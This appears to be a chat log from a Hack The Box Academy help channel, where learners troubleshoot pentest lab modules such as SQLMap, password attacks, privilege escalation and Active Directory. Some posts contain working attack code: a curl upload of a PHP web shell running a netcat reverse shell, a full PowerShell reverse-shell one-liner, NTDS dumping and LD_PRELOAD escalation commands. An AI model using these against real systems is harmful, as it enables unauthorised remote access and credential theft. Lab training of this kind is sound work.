have tried xfreerdp and reminna

authenticate doesn't necessary mean rdp

thanks for the subtle hint, I am revisiting this module after a long time, my bad

Probably being dumb, but im having issues with ThreatCheck.exe - in the Intro to Windows Evasion module, every time I build it and run it against any sample I get the exact same result.. Anyone else faced similar issue?

hello guys! what is the answer for the first question of Module 'Attacking Web Applications with Ffuf'; Section: Skills Assessment - Web Fuzzing??? I performed vhost fuzzing and got couple of hits but i dont know in which order i should put them as answer.

Hi bro, am having the same challenge , how do i decrypt the cookie in plaintext?

The answer format should be like this(only the subdomain name as written in the Q): subdomain1 subdomain2 subdomain3

Linux Privilege Escalation
Shared Libraries
Escalate privileges using LD_PRELOAD technique. Submit the contents of the flag.txt file in the /root/ld_preload directory.

When I was reading, in the reference they showed how to escalate privileges using sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart, however when I check which commands I can run as sudo, I get
User htb-student may run the following commands on NIX02:
(root) NOPASSWD: /usr/bin/openssl
I know how to escalate my privileges using ssl, but that is not really related to LD_PRELOAD. I need help figuring out how to start

yeah, thanks, got them finally. i separate them by comma and it helped

seems like they've updated the ans format then

hey guys anyone can help me with sea machine to solve im stuck in netcat command im unable to recive anything. if you could pls help me

this would be for #boxes

DM me bro

anyone is thee to help me through the sea machine?

if you reffered this to me then i dont have acces for it :9

read #rules and #welcome

why it can't connect?

try with sudo

useful

I'm sorry If its the wrong forum but I really need help and I'm not sure where to submit it:
HTB Academy recognize my browser with adblock, even if there is none installed (and I tried Chrome, firefox and Edge).
Due to that, I cant contact support (even though until few days ago everything was fine even with adblock.

Does anyone knows how to fix it?

prob you arent fully deleted adblock

There's an email customerops@hackthebox.com

I've tried to login from browsers which dont have adblock installed.

you had adblock as browser extension or as an app?

For Chrome yes, But It seems it somehow got picked up in the server, and It displays there is adblock from every broswer.

I have the same Amit. My browser has no adblock and somehow it did get a notification about it this morning

maybe Chrome changed something on their end

try to contact them via email

But It's not just Chrome. I think maybe this is from their side..
Up until few fays ago everything was fine even with adblock.

I sent an email. I hope it will work.

Morning guys, I am busy with the Skills Assessment - Windows Fundamentals module. And I am trying to create a shared folder by going to advanced sharing and changing the share name there, i also checked the "share this folder" box and applied the changed settings but the folders name does not change automatically, what would be the reason for this?

Where would the "NTLM password hash" be here? htb-student:1002:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::

I have submitted aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58, aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: and :aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: all says incorrect answer

This section needs to be revised and on top of that it gives 0 cubes. Its jsut not good
https://academy.hackthebox.com/module/113/section/2164

Finally !! its great module

fun to learn ADCS tho

This module is awesome yes

I hope it'll get updated with esc12-15

yea it was fun learning

one of the best read I ever had

hope sooo

username:rid:lm:nt

Also curious about this

Your hint is right! VERIFIED SOLUTION: Start the answer with "sudo tcpdump"!

So that tiny bubble to open up support/AI questionnaire turned into a massive banner that follows the scroll for every page?

Might be off topic here, not sure where else to post this. Looking for an invoice for an annual subscription, HTB never emailed me anything and I need it to submit. Cannot seem to find anywhere in the Academy to download receipts / invoices from a billing page. Anyone have an answer for this one?

Why sqlmap -u "http://94.237.50.65:33570/case8.php" --dump --batch --csrf-token="t0ken" --method "POST" --data id=1&t0ken=4hgWm3mI7IBSOKGsvg6tgE5nbuV0F9E4GLrlvQR9i4 works and sqlmap -u "http://94.237.50.65:33570/case8.php" --data "id=*&t0ken=qqLdNv4CJE6A0R4jJZAI2wEv2rTV4VWJzEzJAxa0uwI" --dump --batch --csrf-token="t0ken" does not. A difference is in quotes and I use fish terminal. Is it a different terminal behaviour?

good afternoon! I need assistance on gaining controlling DC01 on the skills assessment on documenting and reporting. I have a few account passwords that can access the domain, however I am unable to obtain the admin hash/ cannot crack the NT hash when using hashcat. Any ideas?

It shouldn't make an impact, I am sure I tried it but if --data is defined, it is intelligent enough to make it POST.

Hey guys I have a doubt , I want to develop a saas using mern stack but it's hard to use chat gpt for this , it won't stay on a same track , is there any trick to develop bigger projects using chatgpt

You can have bigger context window when using API, perhaps route it between the files giving it an ability to request some. There is a service that builds the whole project using API, I don't remember the name. It wasn't working well with SvelteKit, but it should with less new frameworks.

I would not assume its intelligent enough. Its the same command so leaving --method out and not defining its a post request breaks it, also the token seems to differ.

You can DM what you know, have done, etc.

Is there any connection problems with u guys on the module labs ?

im having problems with my parrot OS, can someone here help me please

bet i dmed u

module: Attacking Common Services - Attacking SMB - Login as the user "jason" via SSH and find the flag.txt file the password I have keeps creating an error of "bash: !@28Bszh" whenever I try to use a tool to get the final piece I have his full password and it is correct but keep getting the error

Try using single quotes while entering password

I tried that it didn't work but its fine I resolved it another way i think i used -u instead of -U and smbclient seemed to then work

yes smbclient takes -U for credentials

Has anyone done the "Getting Started Public Exploits" module recently? Been scratching my head about this, currently using the online workstation, the question says that the Web server may take a few minutes to load up, I did a nmap of the IP using -sC and -sV to get versions, managed to find the web server, went to do the exploit but then for some reason the web server closed. Did another nmap, and got the rpcbind, did an exploit for that, that completed. Did another nmap, to see if I can find the Webserver however that has not seem to have worked either. Wanted to find out if other people have had issues with this module

hello, i'm in Linux Fundamentals, System Information

Which kernel version is installed on the system? (Format: 1.22.3) i put many answers but the one i think is right is 6.5.0 but the system says incorrect

What is the name of the network interface that MTU is set to 1500? i've tried tun0 and ens3, neither are correct, after many different types of attempts, i am at a loss on both questions at this point.

any hints or tips would be greatly appreciated

it has been a while since I have done it but I am pretty sure if you read through the content thoroughly the answers are in there

its one of the commands listed

the answers aren't in the text, how to get them sure but i'm pulling my hair out lol

uname -a
Linux htb-3jsa8lsrmy 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux

i think i'm looking at the kernel version, i'm fairly new to this so not exactly sure but the command seems to be uname -a (ive tried uname -v as well)

look at the uname help page you aren't far off

Your on the right track, where would you go if you wanted to find more information about a command in the terminal ?

man uname?

yes or uname --help

[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -s
Linux
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -n
htb-3jsa8lsrmy
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -r
6.5.0-13parrot1-amd64
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19)
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -m
x86_64
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -p
unknown
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -i
unknown
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]
└──╼ [★]$ uname -o
GNU/Linux

i've tried 6.5.0 and 6.5.13 but says theyre both wrong

am i still missing someting?

uname -a

[★]$ uname -a
Linux htb-3jsa8lsrmy 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux

Did you SSH into the target?

i spun the machine up right inside the module

i'm not sshing from my own machine if thats what you're asking

6.5.0-13parrot1-amd64 - thats the pwnbox

am i SSHing within the VM? or am i doing it from the machine i am physically working on. i think thats where i am getting hung up on that

ssh in the pwn box to the target IP that comes up under questions section

creds are already given to you

i'm not seeing the IP, i do see the credentials

[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-3jsa8lsrmy]─[~]

10.10.15.110?

SSH to IP ADDRESS with user "htb-student" and passord .....

Look at the screenshot above that mczen shared.

this is y first time doing this on HTB, my apologies

Its all good. Be sure to take and maintain notes.

ok i see the ip in his screen shot, i'm searching to see if i missed that on my screen

for future reference, i don't see an ip on my screen that i would SSH into, any reason?

you have to start target, you'll get an ip.

oooooooo i thought starting the target was the same as starting up the VM

ok i start the VM and use the VM to SSH into the target, broken brain

yes you got it.

ok i'm getting acclimated to the setup, thank you all, so helpful. i appreciate you all just not giving the answers, i need to suffer through what i don't know. i know you can appreciate that

if you haven't done the intro to academy module yet it may help you, it's fairly short but shows you how to navigate around

i did it but it was a few days ago and i was just finishing the google cyber secrutiy cert, been taking in a lot of information

all good now, thanks again!

Cool nice one congrats. Like someone said before. Open up Onenote or any text editor you like and make notes for each topics/modules. Helps out a lot

i have obsidian open and i'm noting away, appreciate the reminder for sure! i'm a terrible note take so trying to take more than i think is neccessary

You can create a task with -x flag and export its XML so you can use it as a template, make sure <actions> , <triggers> and <settings> are formatted properly, each element must be present and well structured within XML file, because task scheduler expects every tag in place

In CME modules generally handle XML generation automatically, with limited flexibility in directly modifying template unless you customize the source code

It leverages WMI to execute commands remotely, so it avoids task scheduler, which means no XML involved in the process, because it is different from atexec where CME creates tasks under the hood

Do the modules sometimes feel like theyre out of order?
I was doing an infosec intro module and got to a wireshark decryption part, but the decryption part was needed to solve the solution and the actual part of the module about decryption was after i finished the flags?

This isnt the first time either, there have been a few times where a new concept is introduced and then fully covered in the next part of the module

need a hnint in api attack skill assessment, guys

I'm logged in as supplier and now I'm trying to read flag.txt.
I found an input to upload cv, but it is possible to upload a file with `.pdf' extension.

When I try to read ../../../flag.txt or something, I can't read it, can you give me a hint 🙂

module: Attacking Common Services - Attacking SQL Databases I am on q1: What is the password for the "mssqlsvc" user? I have used mssqlclient and tried sqsh and I can get to the databases I get that flagdb requires the credentials from the q1 to get the flag but I cannot figure out where this is. Any nudges would be greatly appreciated

Try one of the methods in the reading

You can DM me what you are trying to do.

I have tried them I am in the db, I just cannot find anywhere that would store creds. I googled and it said the master db but I couldn't see anything

In the reading, is there not mention of stealing hashes?

ok thank you , I will have to keep digging

hi, i'm working on Attacking Active Directory module on the section "Privileged Access"

I'm trying to answer the end of section questions, using bloodhound

i have run sharphound collector on the target and managed to ingest those into my Bloodhound install locally

Can someone tell me where I can find a good explanation for the module dynamic port forwarding with ssh and socks tunneling? It's extremely poor written

Been arguing with chatgpt for 30 minutes to understand this

You can dm, if you want.

I feel like I should see results for the cypherqueries given in the section

however i don't...

I did manage to find the answer for the first question in the section using PowerView

Thx bro but I feel like I need some resource or something. Like the whole module is just a mess

but I'd like to see it in bloodhound and I'm not sure whether the queries are not yielding anything because I am doing something wrong or the data collected from the domain by sharphound doesn't contain any users with those rights/privs

Still need help with the Open-Source Software under Win Evasion Techs

If anyone can give me a hand actually executing either the obfuscated exe or load Invoke-Seatbelt in powershell would be great as it doesnt work whenever I tried

Executing any .exe is against the group policy and I always get an error running the ps1 script

does sqplus comes pre installed in pwnbox? if not , can someone guide me how to install it? thanks.

sqlplus

sudo apt install oracle-instantclient-sqlplus

@midnight kindle

ty

I'm on this module: https://academy.hackthebox.com/module/18/section/81

first question is: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

i ran code i thought would work but got nothing back. I then checked the walkthrough, pasted the code it suggested and got nothing back. I reset the machine and tried again, still nothing. thoughts?

code I came up with: find / -type f -name *.conf -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null
AND
find / -type f -name *.conf -user root -size +25k -a -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null

walkthrough code: find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 2>/dev/null

You can remove some of the flags, but also check if finding file .extension is working in your command.

Module Attacking AD Section Privileged Access. Not sure this is working properly. I have run sharphound and ingested resulting Bloodhound files into my local installation of BloodHound CE. Then run the queries given in the section to find the user that PSRemote rights. No results.

I then checked the walkthrough which does exactly the same, same query, i copied and pasted no results.

In fact I feel like the bloodhound data i have ingested does not contain any users that have psremote to a com puter in the domain.... just from browsing the data

I currently have a hash, but whenever I go to crack it, I either get a super basic password or I get an error, it is an ntlmv2 hash correct? i used the impacket-smbserver to do so

Have you considered the super basic password is correct?

You can dm if you want.

i did but I put it in the answer and it wasnt right

Windows Privilege Escalation - User Account Control
what is the point of UAC bypassing if i can just get the admin token anyway by running the process as admin?

it was a different simple password 🤦‍♂️

If you have admin privileges you can either use those for UAC or most of the time you wont be prompted for them. Sometimes its useful to bypass UAC even with admin if you don't have a gui

is it only when i don't have gui i would need the bypass?
tbh i don't feel that this UAC is useful anyway

If you have admin on the machine then yes that would be the only usecase

if you have adminsitrator on a windows machine though then you basically have it rooted

@midnight galleon are you able to help me with this?

i mean when i am not admin but i have some right

is the UAC bypass still usefull?

UAC is used to elevate your access token, so you can elevate from medium to high integrity

sadly i haven't done this module properly i need to restudy it haha

Ah no worries

ok so if for example i did a UAC bypass and my account is a standard user account, does that count as a priv esc?

Yes

the bypass will give me all the admin privs?sounds not right

Basically the way windows determines who can do what is with access tokens that range from System, down to Low. Standard users by default are set at a medium and Administrators are set to high. UAC bypass lets you increase your integrity level on the machine from medium to high

anyone up for a DM regarding the hard lab for the Password attacks module (https://academy.hackthebox.com/module/147/section/1356)? I want to make sure I'm not down some silly rabbit hole...

so if i have this high level, can i access resources that are protected beyond my permissions? like go and dump the sam db or smthing

You would be a standard user but can use a high integrity access token

It depends on the setup of the computer/domain but you can check the NTFS perms but most likely no (90% sure)

You would need System level I believe

completed the section thank you so much for mzking me look at the obvious sorry to pester you

ok i kinda got it thanks

No worries!

lol even the guys at Microsoft said it is useless

Yeah there are way to many bypasses

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md

ok, to give a bit more info... I have cracked the bitlocker password, but I can't use it because I can't mount the virtual drive without admin rights... Turning every stone I turned my attention to some visible network hosts, but after password spraying didn't work (and brute-forcing with the usual not getting anywhere quickly) I'm getting the feeling that those hosts are not really part of the game... Do I just need to find myself a windows host where I'm an admin, to open this drive?..

Hi. Does anyone here every run into a problem where it seems there should be a port attached to the box' IP, but there isn't? I'm on module/23/section/254, Remote File Inclusion (RFI), and unlike all the other sections of the module, no port shows up and the machine IP doesn't resolve in the browser. I tried resetting it a few times. The machines are also non-responsive to pinging. Also, I can reach other modules' machines

I imagine there's some temporary backend issue. Giving up for the day. I will try again tomorrow.

yeah, just needed to spin up another room... massive waste of time. Alright, onwards and upwards...

... tomorrow.

which stage were you up to?

not sure what you mean, but it was the last exercise of the module

so you were past the keepass bit?

yes

ok gotcha, well if you took notes and are going again tomorrow I can try help. I got my notes from it

sorry, I wasn't clear, I finished it. But actually I'd be happy to compare notes because I find it really strange that I had to do what I did

ohh thats good then, yeah ill be on tomorrow

cool 🙂 thanks

Are you still working on this?

finished it, but still curious whether I did what I was supposed to do

Nevermind it looks like you're done

You can DM if you'd like.

thank you, I have

Is there a problem with CPN ?

VPN

I don't recall saying anything about a VPN issue.

I keep losing connection to my lab

Were you able to get the hashes? I'm in the same module, and it's been a good while. How long did it take for you to get your hash?

Soloution I found (unintended I believe) is that as apart of the Applocker section of the module you can run exe in C:\Windows\Tasks\ so just move the exe there. Would be usefull to add in the question. Will add to erratum

Hey I just got this to work. DM when you want.

can someone plz help me on the last section (skills assessment) of the Attacking WPS module? the AP i'm attacking keeps getting me locked out even when setting delays and time to wait when getting locked out, can someone plz help?

ok, i was SSHed into an IP from a previous page....living and learning lol

Guys, can someone help me here?

I'm working on the Linux Fundamentals module in the Find Files and Directories section, it's asking me this: "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"

I'm using this command but it's not working: find / -type f -name "*.config" -newermt 2020-03-03 -size +25k -size -28k -exec ls -la {} ; 2>/dev/null

Do any of you guys have some idea of what can I do?

i am literally stuck on the same question and just realized the target IP is not the same from the previous exercises. i just created the proper target and SSHed in. check to see you havent made that mistake

I mean, I had a problem and had to relaunch the vm, could that be the problem?

What worked for you? Did you reset the target?

yes i clicked the target button to get the IP, i was still in a previous machine. I've been on HTB for two days now so either new targets are a norm as you move through the modules or i timed out and a new one was neccessary, i don't know yet

so everything i tried failed because i was simply in the wrong machine. silver lining, i'm probably a little better at linux now lol

lol, I reseted here, let's see if it works

it will, literally everything i tried first the first time worked this time

i mean i hope for your sake

Hello friends, has anyone else had trouble installing the ODAT tool in the foot printing module? The script in the module doesn't work due to some conflicts with pip3 and having to install the libraries via a python virtual environment. I've been wrestling with it for quite a while now. I've resigned myself to maybe having to build it from source code according to the projects GitHub readme. Just wondering if there's an easier way

IT WORKED, I had a typo, typed config instead of conf, smh

Thx for your help bro @civic steeple

haha there you go

someone way more seasoned than me would've caught that, my apologies

Nah bro, that's fine, you helped me think, haha

I followed the install instructions provided and didn't have any issues

Thanks for the response! The instructions in the GitHub project or the HTB module?

HTB

Hm. Perhaps it's my distribution. I'll have to tinker with it a bit more. Thanks for responding~

I'm in SQLMap Essentials > Attack Tuning > What's the contents of table flag6? (Case #6)
The hint tells you what prefix to use -- ||i.e. '`)'.|| -- but how would I know that without the hint?

probably experience with SQL queries

I'm using kali VM -- sometimes when I use ffuf I get 1000 req/sec and other times I only get like 300 req/sec. Is there any way to speed this up without increasing threads? I'm trying to do the web fuzzing skills assesment but it's taking forever.

I see. I've noticed the speed is dependent on what domain is being used. Is there a chance this could be faster if I try this at a different time, or is this just how it's going to be?

i hear that, goodluck

I already solved it, thank you very much

solved or still open?

curl -k -X PUT -H "Host: 10.129.164.186" --basic -u fiona:987654321 --data-binary '<?php system("cmd.exe /C "echo open 10.10.14.34 4444 > C:\Windows\Temp\nc.txt && nc -nv 10.10.14.34 4444 -e cmd.exe""); ?>' --path-as-is https://10.129.164.186/../../../../../../xampp/htdocs/1af271ec0935f7ccbd31dc24666f7f33.php my rev shell dint work this is easy lab attacking common services

i solved the lab with normal webshell but want know why this rev shell drops

Hi guys I need help with a question on the password attack module

Attacking Active Directory & NTDS.dit

nvm I managed to solve it

(not sure where it would be best to ask this, berate me if this is too offtopic, but) For those of you taking notes with Obsidian, do you use the git plugin? And why do that over just having your vault in a git repo that you "manage yourself" ?

Hi guys, I need help with this question

I created a list of usernames from the given names, however how do we use these usernames in order to attack smb?

here is my command

usernames2.txt is the list of usernames i created

Wdym? You already figured it out

yeah I did thanks but Im having issues submitting the answer

Just paste the valid username and password into the answer

username:password format

i did check this out

Please no spoilers

Thanks

sorry

how do we add spoilers?

It tells you the valid one just paste it in

U don't

ah ok I tried pasting it in doesnt work

Make sure it's without all the stuff that netexec outputs and it's just username:password

yeah thats what I did

can I show u?

you found the password to another user

I haven't done the module

read the question again

ah yes

thank u but why did it stop at this user and not carry on finding out all of them?

Netexec by default stops after finding a valid user

You can specify it to continue

there's a flag to keep going. Alternatively, you can make a new userlist to focus on the target user

ah ok guess i should delete the other users in that case

could u tell me the flag pls?

you need to get into the habit of finding it on your own 🙂

netexec smb --help will tell you

--continue-on-success

Sigh.

thank u all

I am doing AD Administration: Guided Lab Part I in Introduction to Active Directory module. Facing trouble connecting to RDP.
Am I doing something wrong or is it infrastructure issue?

Use remmina or another tool

Hi guys anyone know why this doesnt work

show the command

netexec smb 10.129.202.85 -u username -p password --ntds

ive hidden the username and password from spoilers

Used windows Remote Desktop Connection (Black Screen), shifted to wsl kali xfreerdp (Black Screen), and rdesktop is atleast showing a display.

Thanks remmina worked. Do you know what was the issue?

module name section name and question also helps

Black screen, just hit enter

Pssword attack module and herer is the specific one in the module

Attacking Active Directory & NTDS.dit

Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)

I used the username list of Jennifer Stapleton to get her usename and password

wait a minute

apparently ive already got it 🤔

Hi. I need help to solve on the Footprinting - DNS in the following

Q4: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

So far I've done the following:

• Performed ||the subdomain bruteforcing as in the guide module||
• Performed ||the same thing, but with running through $subs.internal.inlanefreight.htb ...||
• Retried ||dig axfr on the subdomains that I've found from dig axfr internal.inlanefreight.htb ...||
  None of them are worked. Is there any guide that I might be missed out? Thanks in advance!

I thought we needed the ntlm hash or something

nope, not working, would use remmina for now but this issue seems weird to me

You may need a bruteforcing tool

you mean this one? I've done performed it, but nothing that I found the FQDN IP that ended with 203

You can use a subdomain in the query

Hi, i need help in a skill assessment, i am doing the shells and payload real world situation and i have to connect via rdp to an internal network pc, but when i connect i get into a really old version of parrotos, for the scenario i have to visit an url but in the os there isn't a browser, what shoul i do?

i see. lemme try with any subdomains that I found from the previous guide. thanks for the hint

Edit: Finally got the value. Thanks!! 🙏

Type firefox in terminal

firefox google.com

ty guys

Also check the desktop

https://tenor.com/view/this-ones-free-the-next-one-will-cost-you-free-stuff-next-time-next-question-free-answers-gif-14135325

Or another question is "are there any indications that it's worth cranking sqlmap's --risk and --level to 11?" In other words, what do I look for that suggests a parameter is vulnerable if only we try harder vs a well-handled parameter?

I have the same Problem, whats the solution for the snytax errors?

11 isn't a valid number

Spinaltap?

Mine goes to 11.

Does sqlmap go that high?

Mine might be outdated then

It does not. "Turn it up to 11" is from a mockumentary called Spinaltap. I don't recall the values, 3 and 5 I think.

The question isn't about the values, I'd like to know if there are indications that turning up --risk and --level are worth trying or if it's just a param that's handled appropriately.

I'm alway getting snytax error using this payload: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.90',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
whats wrong with it?

Got it 🙂 it works with a shell with I found on reverse shell generator 🙂

how did you solve it please

Should I be able to curl docker targets?

╰─$ curl -IL 94.237.59.180:45414
curl: (52) Empty reply from server
╭─l0dest4r@archlinux ~/Downloads 
╰─$ curl -IL 94.237.59.180                                                                                                      52 ↵
curl: (52) Empty reply from server```

It depends what's being hosted

I would expect that to work if it's a webservice

I'm not having much luck with the docker targets

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://94.237.59.180/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to http://94.237.59.180/: Get "http://94.237.59.180/": EOF```

you're most likely forgetting the port

if its an external IP, there will always be a port

I've also tried http://94.237.59.180:45414

with gobuster, same result

can you access the link in your browser?

no

I can open it here - without vpn

Is this that vpn issue I was talking about yesterday again?

VPN is only need for internal IPs

I am connected to HTB vpn but also my own tunnel

this is a public IP, no vpn is needed

Curl and go buster work with my private VPN turned off

Need to get round to sending that support email

PoC and Patching - Validation Logic Disparity.
Any hints? I know I need the email to end in a specific way but thats all

In Parameter Logic Bugs

I'm really liking the cheat sheets you guys put in the modules. I'm still taking notes but it's reducing my name to copy across a lot of commands.

Attacking Common Applications - Gitlab...has anyone found a wordlist to find the additional user for Gitlab? I have used just about every wordlist I can and none of them seem to answer the challenge

Am I just doing this wrong? I am user1 and the results of sudo -l is I can run /bin/bash as user2 with no password but all of these commands return "user2 is not in the sudoers file this incident will be reported." sudo -u user2 /bin/bash -u user2 su -c 'cat /home/user2/flag.txt' sudo -u user2 python -c "with open('/home/user2/flag.txt') as f: print(f.read())" sudo -u user2 awk '{print}' /home/user2/flag.txt sudo -u user2 find /home/user2 -type f -name flag.txt -exec cat {} \;

@soft reef that is interesting I have been through most of them in SecList with no success. I went on to find the flag but all users I found did not answer the challenge.

Ok let me check, 1 sec.

I am running through RY currently but pretty much same result.

according to a write up sudo -u user2 /bin/bash should work

Its in of the seclists list.

So when you ran sudo -l as user1, it said you can run /bin/bash as sudo?

I'm not sure how to give you a hint without giving you the answer, but here's the best I can do:

||Use your sudo rights to run bash||

Yeah the first time I tried I just kept getting "user2 is not in the sudoers file" but then I disconnected, regenerated the box and then ran sudo -u user2 /bin/bash and it worked.

Oh, so it worked for you. I think I had a similar issue when I did it, but I used another method to get past the issue. Can't remember though, it's been a long time.

Hi

I've been working on a pentesting exercise and recently managed to obtain a user's hash with GetUserSPNs.py and cracked it with john. After validating the credentials with GetADUsers.py against administrator.htb, I was able to confirm that the credentials for olivia and ethan are indeed correct.

Here's a summary of what I've done and the issue I'm facing:

Used GetUserSPNs.py to request a hash for the user olivia, cracked it, and verified it alongside ethan's credentials using GetADUsers.py -all.
WinRM access works perfectly with olivia, but I can't connect via WinRM with ethan's credentials, even though the credentials are confirmed to be correct.
When I log in as olivia via WinRM, I can see only three accounts on the machine: olivia, emily, and administrator. However, ethan's credentials should, in theory, allow me to connect.
My question is: Why might ethan’s credentials fail with WinRM access even though they are valid, and what else can I try to troubleshoot this?

Additional Info:

OS: Target machine is Windows Server 2019.
WinRM is configured correctly since it works with olivia.
I’ve already attempted using different Impacket tools and CrackMapExec with ethan, but they don’t return any unusual errors.
Any insights on why I might be facing this issue or suggestions on additional checks or configurations I could try would be greatly appreciated!

only users of the "remote management users" group are allowed to winrm into the machine. Ethan is not part of that group most likely

am stuck in a loop trying to get the user's flag.My guess is the flag is in emily's account which i have not been able to obtain the hash.Any luck??

have you checked what ethan can do/ what groups he is part of?

Ok thanks I will keep cranking away on it. did you have to narrow the list or anything to get it? I have been stuck trying to clear that question for 3 days. I have been using the Python script and it usually times out but I get about 8 to 10 results; none of which have been successful.

Which list are you using?

he is just in the domain group membership , not much help there.Emily is in the "Remote Management Users" but i don't have the credentials to access the account

Not sure if this is the right place

Hello all,

I am currently working on the FTP footrpinting and was able to get the flag.txt file, but when i try to get the first question "Which version of the FTP server is running on the target system? Submit the entire banner as the answer." i cant get the answer.

I have tried the nmap commando nmap -sV --script=banner -p port <ipadress>, nc -nv and even connect to the FTP server but evey time i fil in the banner as an answer i get the response that the answer is wrong. Can someone tell me what i am doing wrong?

Ethan has special rights over another user, try to enumerate that. If you use Bloodhound you can also very quickly check that (if you don't know about bloodhound, its a great tool for AD escalation path visualisation, a bit annoying to set up at first but really great once you get it running)

So you've got the banner but can't submit it?

When i sumbit the banner i only get the response that the answer is wrong, i have re read the whole page and tried everything i can think off.

Can you redact and give me the first and last character of your answer? That way I can confirm whether you have the correct banner.

2 is the first and las it 1

I can send you an pm if you want with a screenshot

I'm afraid that's incorrect. Unless they've changed the answer since I've done it.

Sure

@slate zinc

Bro

hello

Can u help me with some hacking?

like what ?
mention the name and section of module

I am just askin can u help me hack a discord server

I can't send messages in general that's why i messaged here

i cant help you hack a discord server but if all you wanted was to send messages in #general
you can read #welcome and verify (as in link your htb account)
by doing that you will be able to send messages in geenral

note : *its not only me but no one will help you hack a discord server here *

Ok i will do it later so should i dm u server link?

no bro i cant hack a discord server
and its also against the rules

U gotta be kidding me

no fr read #rules

Hacking is also illegal

unless given permission

Who gives permission to hack

the company that will hire you

I know nothing about hacking

you can learn on hackthebox academy

start with the information security path

Hmm

and dont try to hack discord because you dont have permission from them

Yeah get it

good luck :)

I'm in the home stretch, but I'm stuck 😩😩😩

I'm in Attacking Enterprise Networks - Post Exploitation.

Port 22 of 172.16.9.25 is closed, when it's supposed to be opened.

Those of you that finished this final module, can you guide me in the right direction?

172.16.9.25 pinged True in evil-WinRM, but it's closed when I run an nmap scan with proxychains.

Read the section to see it

I did. I made sure socks4 was 9050 before moving forward

i used ligolo for my pivot ¯_(ツ)_/¯

I'm just trying to see why 172.16.8.25 pings true when I'm in evil-WinRM, but port 22 is closed when I nmap it.

Anyone that could give a hand on Common Session Variables (Account Takeover) on Abusing HTTP Misconfigurations ?

I have done the account takeover but the login2.php suddenly requires a mfa token of sorts. Anyone that has done this that could give a hand?

I have used the cirt, xato-dup, sap, mssql and rockyou

Need a nudge on this as well...

Nmap can be funky over proxy

Then you should have found it, its in there. So what users are you getting back?

Hi I am trying to indent these two lines in a python file in Vim(can't use nano in this module) but when I tab over with the tab key it doesn't work.

Ive tried some of the online suggestions and they are also recommending that I use tab

In Getting Started Section > Knowledge Check, I obtained my initial foothold on the system, but I don't have access to any commands like: wget, sudo, apt, su, python, python3, etc. Pretty much everything except cat, cd, and ls. Even when looking at what is installed under /bin and all of the packages we are used to. But still am not able to use them when using absolute pathing. Am I missing something?

click A on your keyboard first

did you figure it out?

shift + A or just 'A'

a

https://opensource.com/article/19/3/getting-started-vim

Sent to you in a DM

How come there is little to no support on CWEE modules got damn

Hi guys 🙂

Could someone check if you can use credentials for ssh login from this page ( https://academy.hackthebox.com/module/176/section/1754 ) to login into machine spawned from next section ( https://academy.hackthebox.com/module/176/section/1778).

It says login pass are kali/kali - but no matter what I do I can't connect to spawned machine.
Just wanted to check if there is something wrong with the module before I contact customer support

Cheers
Maciek

Has anyone done Wi-Fi Penetration Testing Basics --> Aireplay-ng module?
The answer of the question: "Set the channel to 11 and test for packet injection using aireplay-ng. On how many APs does it perform packet injection? (Answer in digit format: e.g., 3)"
is not what I got in the output of the required commands.
Can anyone explain to me in private chat please? (I dont wannt spoil here any specifics)

You can DM if you'd like.